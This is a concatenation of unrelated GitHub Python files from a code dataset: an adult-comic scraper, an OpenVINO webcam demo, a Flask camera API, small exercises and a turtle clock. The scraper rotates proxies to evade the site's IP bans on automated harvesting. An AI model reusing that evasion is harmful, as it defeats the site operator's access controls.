self.db.close()\n\n def update(self, sql):\n \"\"\"更新数据(使用sql)\"\"\"\n try:\n self.db.ping(reconnect=True)\n self.execute_sql(sql)\n self.db.commit()\n except Exception as e:\n logging.error(e)\n self.db.rollback()\n self.db.close()\n\n def query_all(self, sql):\n \"\"\"查询数据(返回元组)\"\"\"\n squery = ''\n try:\n self.db.ping(reconnect=True)\n squery = self.execute_sql_fetchall(sql)\n except Exception as e:\n logging.error(e)\n self.db.close()\n\n return squery\n\n def query_dictlist(self, sql):\n \"\"\"查询数据(返回字典列表)\"\"\"\n squery = ''\n try:\n self.db.ping(reconnect=True)\n squery = self.execute_sql_fetchall_dictlist(sql)\n except Exception as e:\n logging.error(e)\n self.db.close()\n\n return squery","repo_name":"7Bcoding/unreachable_host_monitor","sub_path":"db_client.py","file_name":"db_client.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70444781993","text":"# encoding:UTF-8\nimport json\nimport os\nimport platform\nimport sys\nimport time\nfrom Queue import Queue\nfrom threading import Thread\nfrom time import sleep\n\nimport requests\n# 首先获取漫画的基本信息\nfrom pyquery import PyQuery as pq\nfrom requests.exceptions import ConnectionError, ReadTimeout, TooManyRedirects, RequestException\n\nimport init_proxy\nimport read_comic_to_db\n\nproxy_list = []\nurl = \"http://lofi.e-hentai.org\"\nheaders = {\n 'cache-control': \"no-cache\",\n 'postman-token': \"5bd3dab9-6df8-e0b8-a2e7-a714c104c74b\",\n 'cookie': 'xres=3'\n}\nindex = 0\n\n\ndef now():\n return time.strftime(\"[%Y-%m-%d %H:%M:%S]\", time.localtime(int(time.time())))\n\n\ndef init(proxy, page=1, max_page=20, use_proxy=True, dir_name=None):\n global index, proxy_list\n if dir_name is None:\n # 首先创建一个基于当前时间的文件夹\n dir_name = time.strftime(\"%Y-%m-%d %H%M%S\", time.localtime(int(time.time())))\n # 在Windows环境下 文件夹不允许带冒号\n if platform.system() == \"Windows\":\n dir_name = time.strftime(\"%Y-%m-%d %H%M%S\", time.localtime(int(time.time())))\n dir_name = \"data-\" + dir_name\n os.mkdir(dir_name)\n proxies = {\n \"http\": proxy,\n }\n while page < max_page:\n querystring = {\n \"page\": page,\n \"f_apply\": \"Search\",\n \"f_search\": \"Chinese\"\n }\n response = None\n while response is None:\n try:\n if use_proxy:\n response = requests.request(\"GET\", url, headers=headers, params=querystring, proxies=proxies,\n timeout=10)\n else:\n response = requests.request(\"GET\", url, headers=headers, params=querystring, timeout=10)\n if response.text.count('squid') > 0 or response.text.count(\"http://warning.or.kr\") > 0:\n print(now() + \"当前代理出现异常,切换代理\")\n raise ConnectionError(\"has been blocked\")\n if response.status_code != 200:\n print(now() + \"非正常返回结果,代码[\" + str(response.status_code) + \"],切换代理\")\n raise ConnectionError(\"has been blocked\")\n if response.text.count(\n 'Your IP address has been temporarily banned for excessive pageloads which indicates that you are using automated mirroring/harvesting software.') > 0:\n print(now() + \"当前代理已被Ban,切换代理\")\n raise ConnectionError(\"has been blocked\")\n print(now() + \"入侵成功!当前为第\" + str(page) + \"页\")\n except ConnectionError:\n # 如果代理连不上,换一个\n index += 1\n if index == len(proxy_list):\n index = 0\n init_proxy.create_proxy()\n print(now() + \"重新获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n print(\n now() + \"代理[\" + proxies.get('http') + \"]不可用,切换至[\" + proxy_list[index] + \"],当前为第\" + str(page) + \"页\")\n proxies = {\n \"http\": proxy_list[index]\n }\n continue\n except ReadTimeout:\n # 如果代理连不上,换一个\n index += 1\n if index == len(proxy_list):\n index = 0\n init_proxy.create_proxy()\n print(now() + \"重新获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n print(now() + \"代理[\" + proxies.get('http') + \"]超时,切换至[\" + proxy_list[index] + \"],当前为第\" + str(page) + \"页\")\n proxies = {\n \"http\": proxy_list[index]\n }\n continue\n # 获得漫画栏,对漫画栏的每个元素进行迭代 div id = ig\n comic_list = pq(response.text).find('.ig')\n comic_json_list = []\n list_len = 0\n for elements in comic_list:\n comic = read_basic_comic_info(elements)\n # 获取完成基本信息之后,就要遍历漫画的每张图片了\n # imgList = read_basic_comic_info()\n # comic[\"imgList\"] = json.dumps(imgList)\n comic_json_list.append(comic)\n list_len += 1\n print(now() + \"读取漫画信息中[\" + json.dumps(comic) + \"]\")\n\n comic_json_list = json.dumps(comic_json_list)\n print(now() + \"读取了 \" + str(list_len) + \" 个漫画 , 准备写入\")\n if list_len == 0:\n print(now() + \"读取漫画失败,重新读取\")\n continue\n # 最后将当前页的数据写回json\n with open(dir_name + \"/\" + str(page) + \".json\", 'w') as f:\n f.write(comic_json_list)\n page += 1\n print(now() + \"数据写入成功,等待睡眠2秒后进行下一页查询\")\n time.sleep(2)\n return dir_name\n\n\n# 生成一个Comic对象\ndef read_basic_comic_info(element):\n # 链接\n comic_link = pq(element).find(\"a\").eq(0).attr(\"href\")\n # 漫画ID\n comic_id = comic_link.split('/')[5]\n # 漫画标题\n comic_title = pq(element).find(\"a\").eq(1).text()\n # 漫画时间\n comic_date = pq(element).find('td .ik').eq(0).next().text().split(\"by\")[0]\n # 漫画分类\n comic_category = pq(element).find('td .ik').eq(1).next().text()\n # 漫画标签\n comic_tag = pq(element).find('td .ik').eq(2).next().text()\n # 漫画评分\n comic_rank = str(pq(element).find('td .ik').eq(3).next().text().count(\"*\"))\n # 漫画封面\n comic_cover = pq(element).find(\"a\").eq(0).children().attr(\"src\")\n\n dict = {\"comicLink\": comic_link, \"comicId\": comic_id, \"comicTitle\": comic_title, \"comicDate\": comic_date,\n \"comicCategory\": comic_category, \"comicTag\": comic_tag, \"comicRank\": comic_rank, \"comicCover\": comic_cover,\n \"imgList\": []}\n\n return dict\n\n\ndef read_comic_img_info(comic_link, headers, proxy, use_proxy=True):\n if not os.path.exists('ComicData') or not os.path.isdir('ComicData'):\n os.mkdir('ComicData')\n global index, proxy_list\n if len(proxy_list) == 0:\n print(now() + '代理列表为空,重新获取')\n init_proxy.create_proxy()\n print(now() + \"获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n comic_id = comic_link.split('/')[5]\n if os.path.exists('ComicData/' + comic_id + \".json\"):\n print(now() + \"漫画[\" + comic_id + \"]的数据已存在\")\n return\n print(now() + \"正在读取漫画[\" + comic_id + \"]的数据\")\n this_page_link = comic_link\n prev_page_link = ''\n proxy = {\n \"http\": proxy\n }\n page = 0\n img_list = []\n total_page = 999\n # 当上一页和当前页相同时,说明完结了,退出\n while this_page_link != prev_page_link:\n if this_page_link is None:\n break\n try:\n if use_proxy:\n response = requests.request(\"GET\", this_page_link, headers=headers, proxies=proxy, timeout=10)\n else:\n response = requests.request(\"GET\", this_page_link, headers=headers, timeout=10)\n # 代理出了问题\n if response.text.count('squid') or response.text.count(\"http://warning.or.kr\") > 0:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"当前代理出现异常,切换代理\")\n raise ConnectionError(\"has been blocked\")\n if response.status_code != 200:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"非正常返回结果,代码[\" + str(response.status_code) + \"],切换代理\")\n raise ConnectionError(\"has been blocked\")\n # print(now()+response.text)\n if page == 0:\n # 目录页 提取第一页的链接\n tmp = pq(response.text).find('.gi').eq(0).find('a').attr('href')\n if tmp is None:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"读取数据错误,重新读取,切换代理\")\n raise ConnectionError(\"has been blocked\")\n if tmp.count(\"509.gif\") > 0:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"当前代理已被Ban,重新读取,切换代理\")\n raise ConnectionError(\"has been blocked\")\n prev_page_link = this_page_link\n this_page_link = tmp\n page += 1\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"目录页读取完成,开始进入第一页\")\n else:\n # 图片页 提取下一页的链接\n img_link = pq(response.text)(\"#sm\").attr('src')\n # 图片页链接非法\n if img_link is None:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"读取数据错误,重新读取,切换代理\")\n raise ConnectionError(\"has been blocked\")\n if img_link.count(\"509.gif\") > 0:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"当前代理已被Ban,重新读取,切换代理\")\n raise ConnectionError(\"has been blocked\")\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"第\" + str(page) + \"页数据为[\" + img_link + \"]\")\n # 下载中\n download_count = 0\n result = download_img(img_link, comic_id)\n while download_count < 5 and not result:\n download_count += 1\n print(\n now() + \"读取漫画[\" + comic_id + \"]:\" + \"图片下载失败[\" + img_link + \"],重试第\" + str(download_count) + \"次中\")\n result = download_img(img_link, comic_id)\n if download_count >= 5 and not result:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"下载图片失败,重新读取,切换代理\")\n raise ConnectionError(\"has been blocked\")\n # 下载完成\n img_list.append(img_link)\n td = pq(response.text)('#ia').children().eq(0).children().children()\n total_page = int(td.eq(1).text().split('/')[1])\n tmp = td.eq(2).children().attr('href')\n prev_page_link = this_page_link\n this_page_link = tmp\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"第\" + str(page) + \"页读取完成,总共有\" + str(total_page) + \"页\")\n if total_page == page:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"当前漫画已读取完毕\")\n break\n if this_page_link is None:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"读取下一页出现错误\")\n raise ConnectionError(\"has been blocked\")\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"下一页为[\" + this_page_link + \"]\")\n page += 1\n except ConnectionError:\n # 如果代理连不上,换一个\n index += 1\n if index == len(proxy_list):\n index = 0\n init_proxy.create_proxy()\n print(now() + \"重新获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n if index >= len(proxy_list):\n index = 0\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"代理[\" + proxy.get('http') + \"]不可用,切换至[\" + proxy_list[index] +\n \"],当前为\" + (\"目录\" if page == 0 else \"第\" + str(page)) + \"页\")\n proxy = {\n \"http\": proxy_list[index]\n }\n continue\n except TooManyRedirects:\n # 如果代理连不上,换一个\n index += 1\n if index == len(proxy_list):\n index = 0\n init_proxy.create_proxy()\n print(now() + \"重新获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n if index >= len(proxy_list):\n index = len(proxy_list) - 1\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"代理[\" + proxy.get('http') + \"]链接不可用,切换至[\" + proxy_list[index] +\n \"],当前为\" + (\"目录\" if page == 0 else \"第\" + str(page)) + \"页\")\n proxy = {\n \"http\": proxy_list[index]\n }\n continue\n except ReadTimeout:\n # 如果代理连不上,换一个\n index += 1\n if index == len(proxy_list):\n index = 0\n init_proxy.create_proxy()\n print(now() + \"重新获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n if index >= len(proxy_list):\n index = len(proxy_list) - 1\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"代理[\" + proxy.get('http') + \"]超时,切换至[\" + proxy_list[index] +\n \"],当前为\" + (\"目录\" if page == 0 else \"第\" + str(page)) + \"页\")\n proxy = {\n \"http\": proxy_list[index]\n }\n continue\n except RequestException as e:\n # 如果代理连不上,换一个\n index += 1\n if index == len(proxy_list):\n index = 0\n init_proxy.create_proxy()\n print(now() + \"重新获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n if index >= len(proxy_list):\n index = len(proxy_list) - 1\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"出现未知异常 [{0:s}]\".format(e))\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"代理[\" + proxy.get('http') + \"]出现异常,切换至[\" + proxy_list[index] +\n \"],当前为\" + (\"目录\" if page == 0 else \"第\" + str(page)) + \"页\")\n proxy = {\n \"http\": proxy_list[index]\n }\n continue\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"数据查询成功,等待睡眠2秒后进行下一页查询\")\n time.sleep(2)\n if this_page_link == prev_page_link and total_page != page:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"漫画[\" + comic_id + \"]写入出现问题,页数不符\")\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"当前漫画所有页读取完成,进行写入\")\n json_list = json.dumps(img_list)\n with open(\"ComicData/\" + comic_id + \".json\", 'w') as f:\n f.write(json_list)\n print(now() + \"漫画[\" + comic_id + \"]写入完成\")\n\n\n# 下载图片\ndef download_img(img_link, comic_id):\n try:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"下载图片中[\" + img_link + \"]\")\n if not os.path.exists(\"ComicData/\" + comic_id):\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"创建目录[\" + comic_id + \"]\")\n os.mkdir(\"ComicData/\" + comic_id)\n file_name = img_link.split(\"/\")[-1]\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"文件名称为[\" + file_name + \"]\")\n r = requests.get(img_link, timeout=10)\n with open(\"ComicData/\" + comic_id + \"/\" + file_name, \"wb\") as code:\n code.write(r.content)\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"写入完成\")\n return True\n except ReadTimeout as e:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"下载超时 : [{0:s}]\".format(e))\n return False\n except Exception as e:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"下载出现异常 : [{0:s}]\".format(e))\n return False\n\n\n# 从头开始\ndef start(page=1, max_page=20):\n global proxy_list\n init_proxy.create_proxy()\n print(now() + \"获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n\n dir_name = init(proxy_list[index], page, max_page)\n print(now() + \"梳理获取的数据\")\n new_list = []\n for i in range(1, max_page - 1):\n with open(dir_name + '/' + str(i) + \".json\", 'r') as f:\n new_list += json.loads(f.read(-1))\n\n with open(dir_name + '/total.json', 'w') as f:\n f.write(json.dumps(new_list))\n print(now() + \"梳理完成\")\n\n # 将梳理结果写入数据库\n try:\n read_comic_to_db.driver(dir_name + '/total.json')\n except Exception:\n print(now() + \"写入数据库失败,跳过写入操作\")\n # 梳理完成后开始读取图片\n after(dir_name + '/total.json')\n\n\n# 从头开始\ndef multi_start(page=1, max_page=20):\n global proxy_list\n init_proxy.create_proxy()\n print(now() + \"获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n\n dir_name = init(proxy_list[index], page, max_page)\n print(now() + \"梳理获取的数据\")\n new_list = []\n for i in range(1, max_page - 1):\n with open(dir_name + '/' + str(i) + \".json\", 'r') as f:\n new_list += json.loads(f.read(-1))\n\n with open(dir_name + '/total.json', 'w') as f:\n f.write(json.dumps(new_list))\n print(now() + \"梳理完成\")\n\n # 将梳理结果写入数据库\n try:\n read_comic_to_db.driver(dir_name + '/total.json')\n except Exception:\n print(now() + \"写入数据库失败,跳过写入操作\")\n # 梳理完成后开始读取图片\n multi_thread_after(dir_name + '/total.json')\n\n\n# 读取每个漫画的图片\ndef after(total_json_file):\n global proxy_list\n init_proxy.create_proxy()\n print(now() + \"获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n data = ''\n # 将total数据全部读取\n with open(total_json_file, 'r') as f:\n for line in f.readlines():\n data += line.strip()\n data = json.loads(data)\n for comic in data:\n comic_json_after(comic)\n\n\n# 传入一个json对象,进行图片的读取\ndef comic_json_after(comic_json, get_proxy_again=False):\n global proxy_list, headers\n if get_proxy_again:\n init_proxy.create_proxy()\n print(now() + \"获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n read_comic_img_info(comic_json['comicLink'], headers, proxy_list[index])\n\n\n# 读取每个漫画的图片 多线程版本\ndef multi_thread_after(total_json_file):\n global proxy_list\n init_proxy.create_proxy()\n print(now() + \"获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n data = ''\n # 将total数据全部读取\n with open(total_json_file, 'r') as f:\n for line in f.readlines():\n data += line.strip()\n json_list_data = json.loads(data)\n\n # q是任务队列\n q = Queue()\n # data是comic对象队列\n comic_list = Queue()\n # NUM是并发线程总数\n NUM = 15\n # JOBS是有多少任务,也就是comic_list的大小\n JOBS = 0\n\n # 在工作之前,将json_list_data的数据放入comic_list中\n for comic in json_list_data:\n JOBS += 1\n comic_list.put(comic)\n\n print(now() + \"要执行\" + str(JOBS) + \"个任务\")\n\n # 这个是工作进程,负责不断从队列取数据并处理\n def working():\n while True:\n comic_json = comic_list.get()\n print(now() + \"执行新任务:下载[\" + comic_json['comicId'] + \"]漫画\")\n comic_json_after(comic_json)\n sleep(1)\n q.task_done()\n\n # fork NUM个线程等待队列\n for i in range(NUM):\n print(now() + \"创建线程[\" + str(i) + \"]中\")\n t = Thread(target=working)\n t.setDaemon(True)\n t.start()\n # 把JOBS排入队列\n for i in range(JOBS):\n # print(now() + \"执行第[\" + str(i) + \"]个任务\")\n q.put(i)\n # 等待所有JOBS完成\n q.join()\n\n\nreload(sys)\nsys.setdefaultencoding('utf8')\n","repo_name":"Hope6537/hope-tactical-equipment","sub_path":"hope-python-script/comic_hentai/search_and_download_comic.py","file_name":"search_and_download_comic.py","file_ext":"py","file_size_in_byte":20539,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"34065144999","text":"import cv2, sys\nimport numpy as np\nfrom openvino.inference_engine import IENetwork, IECore\n\nmodel_name = 'age-gender-recognition-retail-0013'\npath = \"./intel/age-gender-recognition-retail-0013/FP16/\"\nclasses = {\n 0: \"Girl\",\n 1: \"Boy\"\n}\n\nie = IECore() # Load CPU extenstion\nnet = ie.read_network(model=path+model_name+'.xml', \n weights=path+model_name+'.bin') # Read IR model\n\ninput_blob = next(iter(net.input_info)) # Get input name\n\nout_blob = []\nfor output in iter(net.outputs):\n out_blob.append(output)\n\nbatch, channel, height, width = net.input_info[input_blob].input_data.shape # Get input shape\n\nprint(\"Load IR to device\")\nexec_net = ie.load_network(network=net, device_name='CPU') # Load IR model to device\n\nprint(\"Start\")\ncap = cv2.VideoCapture(0)\nwhile True:\n ret, ori_image = cap.read()\n # cv2.imshow(\"input\", image) # Read image and manipulate\n ori_shape = ori_image.shape # Record original size\n image = cv2.resize(ori_image, (width, height)) # Resize to network image size\n t_image = image.transpose((2, 0, 1)) # Change data layout from HWC to CHW\n\n \"\"\"Infer!!!\"\"\"\n res = exec_net.infer(inputs={input_blob: t_image}) # Inference\n \n for blob in out_blob:\n\n if blob == \"age_conv3\":\n age_info = \"Age: {}\".format(res[blob][0][0][0][0]*100)\n print(age_info)\n else:\n prob = res[blob][0]\n gender_info = \"Gender: {}\".format(classes[np.argmax(prob)])\n print(gender_info)\n \n cv2.putText(ori_image, age_info+\"\\t\"+gender_info, (10, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 1, cv2.LINE_AA)\n cv2.imshow(\"results\", ori_image) \n \n if 0xFF & cv2.waitKey(1) == 27:\n break\n\ncv2.destroyAllWindows()\n","repo_name":"p513817/openvino-age-gender-py-sample","sub_path":"legacy/age_gender_recognition.py","file_name":"age_gender_recognition.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21014147500","text":"from flask import Flask, request\nfrom flask_cors import CORS\nfrom pymongo import MongoClient\nimport json\n\nclient = MongoClient('localhost:27017')\ndb = client.cameras\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/add_camera', methods=['POST'])\ndef add_camera():\n if request.method == 'POST':\n data = request.get_json(force=True)\n rtsp = data['rtsp']\n lip = data['lip']\n lport = data['lport']\n tport = data['tport']\n sip = data['sip']\n sport = data['sport']\n\n if sip == \"\" or tport == \"\":\n p = rtsp.replace(\"[ip]\", lip, 1)\n q = p.replace(\"[port]\", lport, 1)\n rtsp = q\n else:\n p = rtsp.replace(\"[ip]\", sip, 1)\n q = p.replace(\"[port]\", tport, 1)\n rtsp = q\n \n db.camera.insert_one(\n {\n \"rtsp\": rtsp,\n \"lip\": lip,\n \"lport\": lport,\n \"tport\": tport,\n \"sip\": sip,\n \"sport\": sport\n }\n )\n\n return \"success\"\n\n@app.route('/show_camera', methods=['GET'])\ndef show_camera():\n l = []\n data = db.camera.find()\n for d in data: \n l.append(d[\"rtsp\"])\n return json.dumps(l)\n\n@app.route('/delete_camera', methods=['POST'])\ndef delete_camera():\n if request.method == 'POST':\n data = request.get_json(force=True)\n rtsp_link = data['rtsp']\n \n db.camera.delete_many({\"rtsp\":rtsp_link})\n\n return \"success\"\n\nif __name__ == '__main__':\n app.run(host=\"10.138.0.32\", debug=True)\n","repo_name":"bipni/tunnel","sub_path":"gcp-instance/addcamera.py","file_name":"addcamera.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73249393194","text":"def polynomial_mul(a, b):\n result = [0 for _ in range(len(a) + len(b) - 1)]\n for i in range(len(a)):\n for j in range(len(b)):\n result[i + j] += a[i] * b[j]\n return [i % MOD for i in result]\n\n\ndef get_result(a, q):\n global n, k\n while n >= k:\n for i in range(k, 2 * k):\n a[i] = sum((-q[j] * a[i - j]) % MOD for j in range(1, k + 1)) % MOD\n r = polynomial_mul(q, [(q[i] if i % 2 == 0 else -q[i]) % MOD for i in range(len(q))])\n a = [a[i] % MOD for i in range(len(a)) if i % 2 == n % 2]\n a.extend(0 for _ in range(2 * k - len(a)))\n q = [r[i] for i in range(len(r)) if i % 2 == 0]\n n //= 2\n return a[n]\n\n\nMOD = 104_857_601\nk, n = map(int, input().split())\nn -= 1\na = list(map(int, input().split()))\na.extend(0 for _ in range(2 * k - len(a)))\nc = [1, *map(lambda x: MOD - int(x), input().split())]\nprint(get_result(a, c))\n","repo_name":"priamoryki/ITMO","sub_path":"semester-4/discrete-math/Lab-1/TaskI.py","file_name":"TaskI.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"10859045019","text":"#求学生成绩平均数\n#\n# def main():\n# number = int(input('请输入学生人数: '))\n# names = [None] * number\n# scores = [None] * number\n# for index in range(len(names)):\n# names[index] = input('请输入第%d个学生的名字: ' % (index + 1))\n# scores[index] = float(input('请输入第%d个学生的成绩: ' % (index + 1)))\n# total = 0\n# for index in range(len(names)):\n# print('%s: %.1f分' % (names[index], scores[index]))\n# total += scores[index]\n# print('平均成绩是: %.1f分' % (total / number))\n#\n#\n# if __name__ == '__main__':\n# main()\n\ndef main():\n name = []\n sorce = []\n a = 0\n need = 'y'\n while need == 'y':\n a += 1\n # nam = input('请输入第%d个学生姓名' % (a))\n # name.append(nam)\n sorc = input('请输入第%d个学生成绩' % (a))\n sorce.append(sorc)\n # print(sorce)\n need = input('是否继续添加?y/n')\n\n total = 0\n for i in range(0, len(sorce)):\n total += int(sorce[i])\n print(\"平均成绩为: \", total // len(sorce))\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"Lonong/Python_first","sub_path":"python/studentsys/sorce_mean.py","file_name":"sorce_mean.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20723428256","text":"import os\nfrom urllib.parse import urlparse\nimport requests\n\n\ndef download_images(all_image_links, safe_folder):\n os.makedirs(safe_folder, exist_ok=True)\n for index, space_image_link in enumerate(all_image_links):\n path = urlparse(space_image_link).path\n extension = os.path.splitext(path)[1]\n image_name = f'space_image_{index}{extension}'\n filename = os.path.join(safe_folder, image_name)\n response = requests.get(space_image_link)\n response.raise_for_status()\n with open(filename, 'wb') as file:\n file.write(response.content)","repo_name":"remboinc/download-photos-from-NASA","sub_path":"download_images.py","file_name":"download_images.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24673817084","text":"#Clock Assignment\nimport turtle\nimport datetime\nscreen=turtle.Screen()\nClock=turtle.Turtle()\n#screen setup\nscreen.bgcolor(\"light green\")\nscreen.title(\"Clock Assignment\")\nscreen.setup(width=1000, height=700)\npen=turtle.Turtle()\npen.speed(0)\npen.penup()\npen.goto(0,0)\n#Draw Layout of Clock\ndef draw_layout_of_clock(clock,x,y,radius, angle,color): #In this function the first arg is a positional argument\n clock.speed(0)\n clock.penup()\n clock.color(color)\n clock.begin_fill() #call the turtle to fill circle before drawn\n clock.goto(x+radius,y) # Move turtle along x axis by distance of radius and \n clock.setheading(angle) #set the turtle head to the given angle\n clock.pendown()\n clock.circle(radius)# draw circle\n clock.end_fill() #Fill circle after last call of draw_layout_of_clock to begin fill.\n clock.penup()\n clock.goto(0,0)\n\ndraw_layout_of_clock(Clock,0,0,300,90,\"dimgray\") #Outercircle to decorate outerside of clock \ndraw_layout_of_clock(Clock,0, 0,280,90 ,\"darkgray\")# \ndraw_layout_of_clock(Clock,0,0,8,90,\"black\")#inner most circle\n#Writing clock points on the circle by using hash \nHash=turtle.Turtle() \nHash.hideturtle()\npen.penup()\npen.goto(0,0)\nHash.setheading(90)\nHash.speed(0)\nfor i in range (60):\n if i%5==0:\n Hash.penup()\n Hash.pencolor(\"orange\")\n Hash.pensize(4)\n Hash.forward(260)\n Hash.pendown()\n Hash.forward(19)\n Hash.penup()\n Hash.goto(0,0)\n Hash.right(6)\n else:\n Hash.pensize(2)\n Hash.pencolor(\"black\")\n Hash.speed(0)\n Hash.goto(0,0)\n Hash.forward(274)\n Hash.pendown()\n Hash.forward(5)\n Hash.penup()\n Hash.goto(0,0)\n Hash.right(6) \n\npen.color(\"black\")\npen.penup()\nClock_Number=turtle.Turtle()\nClock_Number.setheading(60)\nClock_Number.speed(0)\ni=1\n#The following while loop writes the number of clock at the directed position 1-12\nwhile i<=12:\n Clock_Number.penup()\n Clock_Number.goto(0,-15)\n Clock_Number.forward(240)\n Clock_Number.pendown()\n Clock_Number.write(i,align=\"center\",font=(\"Stencil\",20,\"normal\"))\n Clock_Number.penup()\n Clock_Number.goto(0,0)\n Clock_Number.right(30)\n i=i+1\n#drawing hour hand shape,size and color\nHour_hand=turtle.Turtle()\nHour_hand.color (\"black\")\nHour_hand.shape(\"arrow\")\nHour_hand.speed(10)\nHour_hand.shapesize(stretch_wid=0.3, stretch_len=15)\n#Drawing minute hand shape,size and color\nMinute_hand=turtle.Turtle()\nMinute_hand.color(\"green\")\nMinute_hand.shape(\"arrow\")\nMinute_hand.speed(10)\nMinute_hand.shapesize(stretch_wid=0.3, stretch_len=20)\n\n#draw second hand shape,size and color\nSecond_Hand=turtle.Turtle()\nSecond_Hand.color(\"red\")\nSecond_Hand.shape(\"arrow\")\nSecond_Hand.speed(10)\nSecond_Hand.shapesize(stretch_wid=0.2, stretch_len=26)\n\n#The following function is to Move Hour hand clockwise by converting current hour and minute to angle in degree\n#because the point where angle is (0) degree time is 3 O'clock \n#multiplied by -30 means to move hour hand clockwise and angle goes from 0 to -360 in 24 hours.\n\ndef Move_Hour_Hand():\n Current_hr=datetime.datetime.now().hour # get Current hour from computer\n Current_Min=datetime.datetime.now().minute \n angle = (Current_hr - 3) * -30 +(-0.5*Current_Min) #move hour hand smoothly that is for every 2 minute move by -1 degree\n Hour_hand.setheading(angle)\nscreen.ontimer(Move_Hour_Hand, 60000)\n\n#The following function is to move Minute hand by converting current minute and second to angle in degree\n#Here at point where turtle angle is 0 degree minute is 15.The measure of angle between min and min is 6 degree \n#when second hand move by angle of -10 degree, minute hand move by -1 degree\ndef Move_Minute_Hand():\n Current_Min=datetime.datetime.now().minute\n Current_Sec=datetime.datetime.now().second\n angle= ((Current_Min - 15) *-6)+(-Current_Sec * 0.1) \n Minute_hand.setheading(angle)\n screen.ontimer(Move_Minute_Hand,1000) # Here ontimer checks the function called move_minute_hand after 1 sec\n#moving second hand\ndef Move_Second_Hand():\n Current_Sec=datetime.datetime.now().second\n angle= (Current_Sec - 15) * -6\n Second_Hand.setheading(angle)\n screen.ontimer(Move_Second_Hand,1) #Here ontimer checks the move_second_hand function after 1 milisecond to make second precise.\n#The following ontimer is an infinite loop.\nscreen.ontimer(Move_Hour_Hand, 1)\nscreen.ontimer(Move_Minute_Hand, 1)\nscreen.ontimer(Move_Second_Hand, 1)\nturtle.hideturtle()\nscreen.mainloop()\n\n","repo_name":"Usmaelabdureman/Analog-clock","sub_path":"analog-clock.py","file_name":"analog-clock.py","file_ext":"py","file_size_in_byte":4509,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"29172726322","text":"'''\nCalculate how many more points the first person, a, should win in order to satisfy the condition that they have a score higher or equal to 11 \nand higher than the second person, b, by at least 2 points. \n(find the min. If they always same scors, then infinity)\n'''\n\ndef points_to_win(a, b):\n if a >= 11 and a >= b + 2:\n return 0 \n elif a < 11 and b < 11:\n return 11 - a # First person needs to reach 11 points first.\n else:\n return max(11 - a, 2 - (a - b))\n\n# test\n# a_score = 8\n# b_score = 6\n# a_score = 30\n# b_score = 31\n# a_score = 8\n# b_score = 8\na_score = 18\nb_score = 18\nadditional_points = points_to_win(a_score, b_score)\nprint(f\"Person a should win {additional_points} more points.\")\n\n\n","repo_name":"ChopinNo3Op9/funny_coding","sub_path":"extra scores to win.py","file_name":"extra scores to 